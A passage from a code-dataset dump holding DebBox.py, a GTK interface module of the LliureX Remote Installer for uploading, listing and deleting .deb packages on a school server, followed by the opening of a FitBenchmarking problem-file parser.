"line_number": 54, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "474538835", "text": "import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Pango, GdkPixbuf, Gdk, Gio, GObject,GLib\n\nimport copy\nimport gettext\nimport Core\n\nimport Dialog\nimport time\nimport threading\nimport sys\nimport os\n\ngettext.textdomain('lliurex-remote-installer-gui')\n_=gettext.gettext\n\n\nRSRC=\"./\"\n\n\nclass DebBox(Gtk.VBox):\n\t\n\t\n\tdef __init__(self):\n\t\t\n\t\tGtk.VBox.__init__(self)\n\t\t\n\t\tself.core=Core.Core.get_core()\n\t\t\n\t\tbuilder=Gtk.Builder()\n\t\tbuilder.set_translation_domain('lliurex-remote-installer-gui')\n\t\tui_path=RSRC + 
\"lliurex-remote-installer.ui\"\n\t\tbuilder.add_from_file(ui_path)\n\t\tself.main_box=builder.get_object(\"deb_data_box\")\n\t\tself.add_deb_button=builder.get_object(\"add_deb_button\")\n\t\tself.package_label=builder.get_object(\"package_label_deb\")\n\t\tself.package_list_box=builder.get_object(\"deb_list_box\")\n\t\tself.package_list=builder.get_object(\"deb_list_box\")\n\t\tself.data_vp=builder.get_object(\"deb_list_viewport\")\n\t\tself.apply_deb_button=builder.get_object(\"apply_deb_button\")\n\t\t\n\t\t\n\n\t\tself.add(self.main_box)\n\t\t\n\t\tself.connect_signals()\n\t\tself.set_css_info()\n\t\t\n\t\tself.core.current_var=None\n\t\tself.current_id=None\n\t\t\n\t\tself.thread=threading.Thread()\n\t\tself.thread_ret=None\n\t\t\n\t\t\n\t\t\n\t#def __init__\n\t\n\t\n\tdef set_css_info(self):\n\t\t\n\t\tself.style_provider=Gtk.CssProvider()\n\t\tf=Gio.File.new_for_path(\"lliurex-remote-installer.css\")\n\t\tself.style_provider.load_from_file(f)\n\t\tGtk.StyleContext.add_provider_for_screen(Gdk.Screen.get_default(),self.style_provider,Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)\n\t\tself.package_label.set_name(\"OPTION_LABEL\")\n\t\t\n\t\t\t\n\t#def set-css_info\n\t\n\t\n\tdef set_info(self,info):\n\t\t\n\t\t#Empty list\n\t\tfor c in self.package_list_box.get_children():\n\t\t\tself.package_list_box.remove(c)\n\t\t\t\n\t\tself.core.var=info\n\t\tself.core.current_var=copy.deepcopy(self.core.var)\n\t\tfor x in self.core.var[\"deb\"][\"packages\"]:\n\t\t\tself.new_package_button(\"%s\"%x)\n\t\t\t\n\t\t#self.core.lri.main_window.connect(\"delete_event\",self.check_changes,True)\n\n\t#def set_info\n\t\n\t\n\tdef connect_signals(self):\n\t\t\n\t\t\n\t\tself.add_deb_button.connect(\"clicked\",self.add_deb_button_clicked)\n\t\tself.apply_deb_button.connect(\"clicked\",self.apply_deb_button_clicked)\n\t\t#self.core.lri.main_window.connect(\"delete_event\",self.check_changes,True)\n\t\t\n\t#def connect_signals\n\t\n\t\n\tdef deb_list_init(self):\n\t\t\n\t\ttry:\n\t\t\tself.new_debs\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\t#print \"inicializando variables de listas\"\n\t\t\tself.new_debs=[]\n\t\t\tself.list_new_debs=[]\n\t\t\treturn True\n\t\t\n\t#def deb_list_init\n\t\n\tdef check_user_desktop(self):\n\t\t\n\t\tpath=os.path.expanduser(\"~/\")\n\t\t\n\t\ttry:\n\t\t\n\t\t\tf=open(os.path.expanduser(\"~/.config/user-dirs.dirs\"))\n\t\t\tlines=f.readlines()\n\t\t\tf.close()\n\t\t\t\n\t\t\tfor item in lines:\n\t\t\t\tif \"XDG_DESKTOP_DIR\" in item:\n\t\t\t\t\tfirst=item.find(\"/\")+1\n\t\t\t\t\tlast=item.rfind('\"')\n\t\t\t\t\tpath=path + item[first:last].strip(\"\\n\")\n\t\t\t\t\t\n\t\t\t\t\t\n\t\texcept Exception as e:\n\t\t\tprint(e,\"!!!\")\n\t\t\t\n\t\t\t\n\t\treturn path\n\t\n\t\n\tdef add_deb_button_clicked(self,widget):\n\t\t\n\t\tpath=self.check_user_desktop()\n\t\t#print path\n\t\tfcb=Dialog.FileDialog(self.core.lri.main_window,_(\"Please choose a file\"), path)\n\t\tresponse=fcb.run()\n\t\t\n\t\tself.deb_list_init()\n\t\t\n\t\tif response==Gtk.ResponseType.OK:\n\t\t\tdeb_url=fcb.get_filename()\n\t\t\tfcb.destroy()\n\t\t\tpkg=os.path.basename(deb_url)\n\t\t\textension=os.path.splitext(pkg)[1]\n\t\t\tif extension not in [\".deb\",\".DEB\"]:\n\t\t\t\tself.error_extension_dialog(pkg)\n\t\t\t\tfcb.destroy()\n\t\t\t\treturn False\n\t\t\t#Compruebo si es un paquete nuevo de la lista\n\t\t\tif pkg not in self.core.current_var[\"deb\"][\"packages\"]:\n\t\t\t\tself.core.current_var[\"deb\"][\"packages\"].append(pkg)\n\t\t\t\tself.new_package_button(pkg)\n\t\t\t\t#print \"paquete nuevo en 
lista, esta subido??\"\n\t\t\t\t#Compruebo que es accesible via apache, sino lo apunto para copiar cuando aplique.\n\t\t\t\texist_in_server=self.core.n4d.app_deb_exist(pkg, self.core.current_var[\"deb\"][\"url\"])\n\t\t\t\tself.core.dprint(\"(DebBox)(add_deb_button_clicked) self.core.n4d.app_deb_exist: %s\"%exist_in_server)\n\t\t\t\tif not exist_in_server[0]:\n\t\t\t\t\t#print \"No existe este deb lo debo de subir\"\n\t\t\t\t\tself.core.dprint(\"(DebBox)(add_deb_button_clicked) Package %s marked to upload to server\"%pkg)\n\t\t\t\t\tself.new_debs.append([pkg,deb_url])\n\t\t\t\t\tself.list_new_debs.append(pkg)\n\t\t\t\t\t\n\n\t\t\t# ###### #\n\t\t\t\n\t\t\treturn True\n\t\telse:\n\t\t\tfcb.destroy()\n\t\t\treturn False\n\t\t\t\n\t#def add-deb_button_clicked\n\t\n\t\n\tdef hide_window(self,widget,event):\n\t\t\n\t\twidget.hide()\n\t\treturn True\n\t\t\n\t#def new_package_window\n\n\n\tdef check_changes(self,widget=True,event=True,manage_dialog=False):\n\t\t\n\t\t\n\t\tif not manage_dialog:\n\t\t\tif self.core.current_var==None:\n\t\t\t\treturn False\n\t\t\treturn self.core.current_var != self.core.var\n\t\t\n\t\t\t\t\n\t\tif self.core.current_var!=None and self.core.current_var != self.core.var:\n\t\t\tif not self.changes_detected_dialog(False):\n\t\t\t\treturn True\n\t\t\n\t\tsys.exit(0)\n\t\t\t\n\n\t#def check_changes\n\t\t\n\t\n\n\t\n\tdef new_package_button(self,pkg_name):\n\t\t\n\t\thbox=Gtk.HBox()\n\t\tlabel=Gtk.Label(pkg_name)\n\t\tb=Gtk.Button()\n\t\ti=Gtk.Image.new_from_file(\"trash.svg\")\n\t\tb.add(i)\n\t\tb.set_halign(Gtk.Align.CENTER)\n\t\tb.set_valign(Gtk.Align.CENTER)\n\t\tb.set_name(\"DELETE_ITEM_BUTTON\")\n\t\tb.connect(\"clicked\",self.delete_package_clicked,hbox)\n\t\thbox.pack_start(label,False,False,0)\n\t\thbox.pack_end(b,False,False,10)\n\t\thbox.show_all()\n\t\tlabel.set_margin_right(20)\n\t\tlabel.set_margin_left(20)\n\t\tlabel.set_margin_top(20)\n\t\tlabel.set_margin_bottom(20)\n\t\thbox.set_name(\"PKG_BOX\")\n\t\tself.package_list_box.pack_start(hbox,False,False,5)\n\t\tself.package_list_box.queue_draw()\n\t\thbox.queue_draw()\n\t\t\n\t#def new_package_button\n\t\n\t\n\t\n\t# #### PACKAGE CHANGES ################### #\n\t\n\t\n\tdef delete_package_clicked(self,button,hbox):\n\t\t\n\t\tpkg=hbox.get_children()[0].get_text()\n\t\t\n\t\tif self.delete_package_dialog(pkg):\n\t\t\n\t\t\tself.package_list_box.remove(hbox)\n\t\t\t\n\t\t\tfor p in range(len(self.core.current_var[\"deb\"][\"packages\"])-1,-1,-1):\n\t\t\t\tif self.core.current_var[\"deb\"][\"packages\"][p]==pkg:\n\t\t\t\t\tself.core.current_var[\"deb\"][\"packages\"].pop(p)\n\t\t\t#Compruebo que es accesible via apache, y pregunto si lo borro tambien del servidor\n\t\t\texist_in_server=self.core.n4d.app_deb_exist(pkg, self.core.current_var[\"deb\"][\"url\"])\n\t\t\tif exist_in_server[0]:\n\t\t\t\tif self.remove_file_dialog(pkg):\n\t\t\t\t\tself.thread=threading.Thread(target=self.delete_package_thread(pkg))\n\t\t\t\t\tself.thread.daemon=True\n\t\t\t\t\tself.thread.start()\n\t\t\t\t\t\n\t\t\t\t\tmain_window=self.core.lri.main_window\n\t\t\t\t\tdialog=Dialog.ApplyingChangesDialog(main_window,title=\"Lliurex Remote Installer\",msg=_(\"Deleting files.......\"))\n\t\t\t\t\tdialog.show()\n\t\t\t\t\tGLib.timeout_add(500,self.check_delete_thread,dialog)\n\t\t\t\n\t\t\t# ######### #\n\t\n\t\n\t#def delete_package_clicked\n\t\n\tdef delete_package_thread(self,pkg):\n\t\n\t\ttry:\n\t\t\tself.core.dprint(\"Deleting 
file...\")\n\t\n\t\t\turl_dest=\"/var/www/llx-remote/\"+str(pkg)\n\t\t\tself.deleted=self.core.n4d.remove_file(url_dest)\n\t\t\tif not self.deleted[0]:\n\t\t\t\tcomment=_(\"The file %s cannot be deleted\")%pkg\n\t\t\t\tself.remove_file_info_dialog(comment)\n\t\t\t\t\n\t\t\tself.thread_ret={\"status\":True,\"msg\":\"BROKEN\"}\n\t\t\t\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn False\n\t\t\t\n\t#def delete_package_thread\n\t\n\tdef check_delete_thread(self,dialog):\n\t\t\n\t\tif self.thread.is_alive():\n\t\t\treturn True\n\t\t\n\t\tdialog.destroy()\n\t\t\n\t\tfor c in self.package_list_box.get_children():\n\t\t\tself.package_list_box.remove(c)\n\t\t\t\n\t\tfor x in self.core.current_var[\"deb\"][\"packages\"]:\n\t\t\tself.new_package_button(\"%s\"%x)\n\t\tif self.deleted[0]:\n\t\t\tself.core.var=copy.deepcopy(self.core.current_var)\n\t\t\tself.core.n4d.set_variable(self.core.var)\n\t\t\t\n\t\t\t\n\t\t\n\t#check_delete_thread\n\t\n\t\n\tdef apply_deb_button_clicked(self,widget):\n\t\t\n\t\tself.deb_list_init()\n\t\tself.thread=threading.Thread(target=self.apply_changes_thread)\n\t\tself.thread.daemon=True\n\t\tself.thread.start()\n\t\t\n\t\t#Se crea el mensaje de Apply segun si sse suben ficheros o no.\n\t\tself.msg1=_(\"Applying changes.......\")\n\t\tif self.new_debs not in [None,\"\",[]]:\n\t\t\tself.msg1=_(\"Updating files and applying changes.......\")\n\t\telse:\n\t\t\tself.msg1=_(\"Applying changes.......\")\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.ApplyingChangesDialog(main_window,title=\"Lliurex Remote Installer\",msg=self.msg1)\n\t\tdialog.show()\n\t\tGLib.timeout_add(500,self.check_apply_thread,dialog)\n\t\t\n\t#def apply_changes_button_clicked\n\t\n\t\t\n\t\n\tdef apply_changes_thread(self):\n\t\t\n\t\ttry:\n\t\t\t\n\t\t\tprint(\"Testing.....\")\n\t\t\tif self.new_debs not in [None,\"\",[]]:\n\t\t\t\tself.core.dprint(\"Sending files to server...\")\n\t\t\t\tfor deb in self.new_debs:\n\t\t\t\t\tpkg=deb[0]\n\t\t\t\t\tdeb_url=deb[1]\n\t\t\t\t\tif self.core.current_var[\"deb\"][\"url\"] in [None,\"\",[]]:\n\t\t\t\t\t\tself.core.current_var[\"deb\"][\"url\"]=\"http://server/llx-remote/\"\n\t\t\t\t\turl_dest=self.core.current_var[\"deb\"][\"url\"].split('http://server/')[1]\n\t\t\t\t\turl_dest=\"/var/www/\"+str(url_dest)\n\t\t\t\t\tip_dest=self.core.n4d.server_ip\n\t\t\t\t\tuploaded=self.core.n4d.send_file(ip_dest,deb_url,url_dest)\n\t\t\t\t\tif not uploaded:\n\t\t\t\t\t\tself.error_up_dialog(pkg)\n\n\t\t\t\t#Inicializo de nuevo la lista de paquetes, ya esta subido todo lo que se queria.\n\t\t\t\tself.new_debs=[]\n\t\t\t\tself.list_new_debs=[]\n\t\t\tself.core.dprint(\"Applying changes...\")\n\t\t\tself.core.var=copy.deepcopy(self.core.current_var)\n\t\t\tself.test_deb=self.core.n4d.test_deb_list(self.core.var)\n\t\t\tself.thread_ret={\"status\":True,\"msg\":\"BROKEN\"}\n\n\t\t\t\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn False\n\t\t\n\t\t\n\t#def apply_changes_thread\n\t\n\tdef check_apply_thread(self,dialog):\n\t\t\n\t\t\n\t\tif self.thread.is_alive():\n\t\t\treturn True\n\t\t\n\t\tdialog.destroy()\n\t\t#Se pudo testear la lista de debs, es un [True,dict,list_debs_ok,list_debs_fail]\n\t\tif self.test_deb[0]:\n\t\t\tif self.test_deb[3] not in [None,\"\",\"[]\",[]]:\n\t\t\t\tif 
self.delete_test_deb_dialog(self.test_deb[3]):\n\t\t\t\t\tself.core.n4d.set_variable(self.test_deb[1])\n\t\t\t\t\tself.core.var=copy.deepcopy(self.test_deb[1])\n\t\t\t\t\tself.core.current_var=copy.deepcopy(self.test_deb[1])\n\t\t\t\telse:\n\t\t\t\t\tself.core.var[\"deb\"][\"url\"]=\"http://server/llx-remote/\"\n\t\t\t\t\tself.core.n4d.set_variable(self.core.var)\n\t\t\telse:\n\t\t\t\tself.core.var[\"deb\"][\"url\"]=\"http://server/llx-remote/\"\n\t\t\t\tself.core.n4d.set_variable(self.core.var)\n\t\t\t\n\t\telse:\n\t\t\tself.core.dprint(\"Test failed, the variable is not saved\")\n\t\t\n\t\tself.set_info(self.core.var)\n\t\tself.core.dprint(\"Done\")\n\t\t\n\t\tif not self.thread_ret[\"status\"]:\n\t\t\tmw=self.core.lri.main_window\n\t\t\td=Dialog.ErrorDialog(mw,\"\",self.thread_ret[\"msg\"])\n\t\t\td.run()\n\t\t\td.destroy()\n\t\t\n\n\t\treturn False\n\t\t\n\t#def check_apply_thread\n\t\n\t\n\t# ######################################################### #\n\t\n\t\n\t# #### DIALOGS ################### #\n\t\n\tdef error_extension_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.ErrorDialog(main_window,_(\"Error in Extension\"),_(\"The %s package does not have the required extension.\\nOnly DEB packages are allowed in this list.\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\t\n\t\treturn True\n\t\t\n\t#def error_extension_dialog\n\n\n\tdef error_up_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.ErrorDialog(main_window,_(\"Error in publishing\"),_(\"The %s package can't be uploaded to the server.\\nPlease review the parameters or inform the LliureX Team.\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\t\n\t\treturn True\n\t\t\n\t#def error_up_dialog\n\t\n\t\n\tdef delete_package_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"Delete package\"),_(\"Do you want to delete '%s'?\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def delete_package_dialog\n\t\n\tdef remove_file_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"Delete package\"),_(\"IMPORTANT\\nDo you want to delete this DEB from your server?\\n'%s'\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def remove_file_dialog\n\t\n\tdef remove_file_info_dialog(self,comment):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.ErrorDialog(main_window,_(\"Delete package\"),comment)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\t\t\n\t\treturn True\n\t\t\n\t#def remove_file_info_dialog\n\t\n\tdef send_file_dialog(self,pkg_name):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"DEB not in Server\"),_(\"Do you want to send this DEB '%s' to the server?\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def send_file_dialog\n\t\n\tdef send_list_dialog(self,pkg_name_orig):\n\t\tmain_window=self.core.lri.main_window\n\t\tpkg_name='\\n'.join(pkg_name_orig)\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"DEB not in Server\"),_(\"Do you want to send this DEB list to the server?\\n%s\\n\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def send_list_dialog\n\t\n\t\n\tdef changes_detected_dialog(self,force_exit=False):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\t\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"Changes detected\"),_(\"There are unsaved changes. Do you want to discard them?\"))\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\tif force_exit:\n\t\t\t\tsys.exit(0)\n\t\t\t\t\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def changes_detected_dialog\n\t\n\t\n\t\n\tdef delete_test_deb_dialog(self,pkg_name_orig):\n\t\t\n\t\tmain_window=self.core.lri.main_window\n\t\tpkg_name='\\n'.join(pkg_name_orig)\n\t\tdialog=Dialog.QuestionDialog(main_window,_(\"Delete deb list\"),_(\"This DEB list is unavailable from your server:\\n%s\\nDo you want to delete it?\")%pkg_name)\n\t\tresponse=dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\tif response== Gtk.ResponseType.OK:\n\t\t\treturn True\n\t\t\n\t\treturn False\n\t\t\n\t#def delete_test_deb_dialog\n\t\n\t\n#class DebBox\n", "sub_path": "lliurex-remote-installer-gui.install/usr/share/lliurex-remote-installer/DebBox.py", "file_name": "DebBox.py", "file_ext": "py", "file_size_in_byte": 13682, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "gi.require_version", "line_number": 2, "usage_type": "call"}, {"api_name": "gettext.textdomain", "line_number": 15, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 16, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.VBox", "line_number": 22, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 22, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.VBox.__init__", "line_number": 27, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.VBox", "line_number": 27, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 27, "usage_type": "name"}, {"api_name": "Core.Core.get_core", "line_number": 29, "usage_type": "call"}, {"api_name": "Core.Core", "line_number": 29, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Builder", "line_number": 31, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 31, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 53, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.CssProvider", "line_number": 63, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 63, "usage_type": "name"}, {"api_name": "gi.repository.Gio.File.new_for_path", "line_number": 64, "usage_type": "call"}, {"api_name": "gi.repository.Gio.File", "line_number": 64, "usage_type": "attribute"}, {"api_name": "gi.repository.Gio", "line_number": 64, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.StyleContext.add_provider_for_screen", "line_number": 66, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.StyleContext", "line_number": 66, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 66, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.get_default", "line_number": 66, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 66, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 66, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION", "line_number": 66, 
"usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "Dialog.FileDialog", "line_number": 140, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 145, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 145, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 200, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.HBox", "line_number": 210, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 210, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 211, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 211, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 212, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 212, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Image.new_from_file", "line_number": 213, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Image", "line_number": 213, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 213, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 215, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 215, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 216, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 216, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 253, "usage_type": "call"}, {"api_name": "Dialog.ApplyingChangesDialog", "line_number": 258, "usage_type": "call"}, {"api_name": "gi.repository.GLib.timeout_add", "line_number": 260, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 260, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 299, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 310, "usage_type": "call"}, {"api_name": "Dialog.ApplyingChangesDialog", "line_number": 322, "usage_type": "call"}, {"api_name": "gi.repository.GLib.timeout_add", "line_number": 324, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 324, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 353, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 377, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 378, "usage_type": "call"}, {"api_name": "Dialog.ErrorDialog", "line_number": 394, "usage_type": "call"}, {"api_name": "Dialog.ErrorDialog", "line_number": 412, "usage_type": "call"}, {"api_name": "Dialog.ErrorDialog", "line_number": 425, "usage_type": "call"}, {"api_name": "Dialog.QuestionDialog", "line_number": 438, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 442, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 442, "usage_type": "name"}, {"api_name": 
"Dialog.QuestionDialog", "line_number": 452, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 456, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 456, "usage_type": "name"}, {"api_name": "Dialog.ErrorDialog", "line_number": 466, "usage_type": "call"}, {"api_name": "Dialog.QuestionDialog", "line_number": 477, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 481, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 481, "usage_type": "name"}, {"api_name": "Dialog.QuestionDialog", "line_number": 491, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 495, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 495, "usage_type": "name"}, {"api_name": "Dialog.QuestionDialog", "line_number": 507, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 511, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 511, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 513, "usage_type": "call"}, {"api_name": "Dialog.QuestionDialog", "line_number": 527, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ResponseType", "line_number": 531, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 531, "usage_type": "name"}]} +{"seq_id": "93513365", "text": "\"\"\"\nThis file implements a parser for the Fitbenchmark data format.\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function)\n\nfrom collections import OrderedDict\nimport mantid.simpleapi as msapi\nimport numpy as np\nimport os\n\nfrom fitbenchmarking.parsing.base_parser import Parser\nfrom fitbenchmarking.parsing.fitting_problem import FittingProblem\nfrom fitbenchmarking.utils.logging_setup import logger\n\n\nclass FitbenchmarkParser(Parser):\n \"\"\"\n Parser for the native FitBenchmarking problem definition (FitBenchmark)\n file.\n \"\"\"\n\n def parse(self):\n \"\"\"\n Parse the Fitbenchmark problem file into a Fitting Problem.\n\n :return: The fully parsed fitting problem\n :rtype: fitbenchmarking.parsing.fitting_problem.FittingProblem\n \"\"\"\n fitting_problem = FittingProblem()\n\n self._entries = self._get_fitbenchmark_data_problem_entries()\n self._parsed_func = self._parse_function()\n\n fitting_problem.name = self._entries['name']\n\n data_points = self._get_data_points()\n\n fitting_problem.data_x = data_points[:, 0]\n fitting_problem.data_y = data_points[:, 1]\n if data_points.shape[1] > 2:\n fitting_problem.data_e = data_points[:, 2]\n\n # String containing the function name(s) and the starting parameter\n # values for each function\n self._mantid_equation = self._entries['function']\n\n fitting_problem.functions = self._fitbenchmark_func_definitions()\n\n # Print number of equations until better way of doing this is looked at\n equation_count = len(self._parsed_func)\n fitting_problem.equation = '{} Functions'.format(equation_count)\n\n fitting_problem.starting_values = self._get_starting_values()\n\n # start and end values in x range\n if 'fit_parameters' in self._entries:\n start_x, end_x = self._get_x_range()\n fitting_problem.start_x = start_x\n fitting_problem.end_x = end_x\n\n return fitting_problem\n\n def _get_data_file(self):\n \"\"\"\n Find/create the (full) path to a data_file specified in a FitBenchmark\n definition file, where the data_file is searched for in the directory\n of the definition file and subfolders of this file\n\n 
:returns: (full) path to a data file. Return None if not found\n :rtype: str or None\n \"\"\"\n data_file = None\n data_file_name = self._entries['input_file']\n # find or search for path for data_file_name\n for root, _, files in os.walk(os.path.dirname(self._filename)):\n for name in files:\n if data_file_name == name:\n data_file = os.path.join(root, data_file_name)\n\n if data_file is None:\n logger.error(\"Data file %s not found\", data_file_name)\n\n return data_file\n\n def _get_fitbenchmark_data_problem_entries(self):\n \"\"\"\n Get the problem entries from a fitbenchmark problem definition\n file.\n\n :returns: The entries from the file with string values\n :rtype: dict\n \"\"\"\n\n entries = {}\n for line in self.file.readlines():\n # Discard comments\n line = line.split('#', 1)[0]\n if line.strip() == '':\n continue\n\n lhs, rhs = line.split(\"=\", 1)\n entries[lhs.strip()] = rhs.strip().strip('\"').strip(\"'\")\n\n return entries\n\n def _parse_function(self):\n \"\"\"\n Get the params from the function as a list of dicts from the data\n file.\n\n :return: Function definition in format:\n [{name1: value1, name2: value2, ...}, ...]\n :rtype: list of dict\n \"\"\"\n function_def = []\n\n functions = self._entries['function'].split(';')\n\n for f in functions:\n params_dict = OrderedDict()\n # To handle brackets, must split on comma or split after an\n # opening backet\n tmp_params_list = f.split(',')\n if '(' in f:\n params_list = []\n for p in tmp_params_list:\n if '(' in p:\n vals = [v+'(' for v in p.split('(', 1)]\n vals[-1] = vals[-1][:-1]\n params_list.extend(vals)\n else:\n params_list.append(p)\n else:\n params_list = tmp_params_list\n\n pop_stack = False\n stack = [params_dict]\n for p in params_list:\n name, val = p.split('=', 1)\n name = name.strip()\n val = val.strip()\n\n if val == '(':\n val = OrderedDict()\n stack[-1][name] = val\n stack += [val]\n continue\n\n elif val[-1] == ')':\n pop_stack = val.count(')')\n if len(stack) <= pop_stack:\n raise ValueError('Could not parse.'\n + 'Check parentheses in input')\n val = val.strip(')')\n\n # Parse to an int/float if possible else assume string\n tmp_val = None\n for t in [int, float]:\n if tmp_val is None:\n try:\n tmp_val = t(val)\n except ValueError:\n pass\n\n if tmp_val is not None:\n val = tmp_val\n\n stack[-1][name] = val\n\n if pop_stack > 0:\n stack = stack[:-pop_stack]\n pop_stack = 0\n\n function_def.append(params_dict)\n\n return function_def\n\n def _get_data_points(self):\n \"\"\"\n Get the data points of the problem from the data file.\n\n :return: data points\n :rtype: np.ndarray\n \"\"\"\n\n data_file_path = self._get_data_file()\n\n with open(data_file_path, 'r') as f:\n data_text = f.readlines()\n\n first_row = data_text[2].strip()\n dim = len(first_row.split())\n data_points = np.zeros((len(data_text)-2, dim))\n\n for idx, line in enumerate(data_text[2:]):\n point_text = line.split()\n point = [float(val) for val in point_text]\n data_points[idx, :] = point\n\n return data_points\n\n def _get_starting_values(self):\n 